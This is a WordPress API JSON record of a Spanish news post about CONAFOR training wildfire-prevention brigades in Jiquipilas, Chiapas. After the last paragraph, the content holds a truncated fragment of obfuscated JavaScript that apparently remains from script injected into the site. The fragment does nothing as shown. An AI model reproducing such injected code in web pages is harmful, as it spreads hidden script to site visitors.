{"id":713,"date":"2022-03-18T03:27:40","date_gmt":"2022-03-18T03:27:40","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=713"},"modified":"2022-03-18T03:27:41","modified_gmt":"2022-03-18T03:27:41","slug":"conafor-capacita-a-brigadistas-en-materia-de-prevencion-de-incendios-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=713","title":{"rendered":"CONAFOR capacita a brigadistas en materia de prevenci\u00f3n de incendios en Jiquipilas."},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220317-WA0042-1024x682.jpg\" alt=\"\" class=\"wp-image-714\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220317-WA0042-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220317-WA0042-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220317-WA0042-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220317-WA0042-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/IMG-20220317-WA0042.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Se present\u00f3 el programa nacional de prevenci\u00f3n de incendios forestales.<br>\u2022 El Gobierno Municipal refrenda su compromiso con la prevenci\u00f3n de incendios forestales.<\/p>\n\n\n\n<p>17 de Marzo del 2022. Jiquipilas, Chiapas.- Acoplados a las estrategias de combate y prevenci\u00f3n de incendios forestales, as\u00ed como coadyuvar con dependencias para fortalecer los trabajos favorables al medio ambiente, en Jiquipilas colaboradores de la Comisi\u00f3n Nacional Forestal CONAFOR capacitaron a brigadistas del programa &#8220;Cero quemas&#8221; y presentaron el programa nacional de incendios forestales.<\/p>\n\n\n\n<p>En dicha reuni\u00f3n, la intervenci\u00f3n del municipe es de gran importancia debido al compromiso de unificar esfuerzos y fortalecer lazos de trabajos con instituciones nacionales, as\u00ed como inspeccionar las estad\u00edsticas y an\u00e1lisis del actual panorama de los incendios forestales.<\/p>\n\n\n\n<p>Tambi\u00e9n, se hizo menci\u00f3n que la concientizacion ha sido la estrategia m\u00e1s importante, ya que cada vez se unen m\u00e1s voluntariados para esta labor y contar con conocimientos para evitar y actuar ante un incendio fuera de control.<\/p>\n\n\n\n<p>Este curso impartido por la CONAFOR es garant\u00eda de progreso ambiental, ya que se cuenta con un equipo capacitado y con las herramientas de trabajo, as\u00ed como los monitoreos para actuar de manera inmediata.<\/p>\n\n\n\n<p>El pacto Cero Quemas ha generado resultados positivos, por lo que el gobierno municipal refrend\u00f3 su compromiso en la prevenci\u00f3n de incendios forestales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Se present\u00f3 el programa nacional de prevenci\u00f3n de incendios forestales.\u2022 El Gobierno Municipal refrenda su compromiso con la prevenci\u00f3n de incendios forestales. 17 de Marzo del 2022. Jiquipilas, Chiapas.- Acoplados a las estrategias de combate y prevenci\u00f3n de incendios forestales, as\u00ed como coadyuvar con dependencias para fortalecer los trabajos favorables al medio ambiente, en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":714,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-713","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/713","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=713"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/713\/revisions"}],"predecessor-version":[{"id":715,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/713\/revisions\/715"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/714"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=713"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=713"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}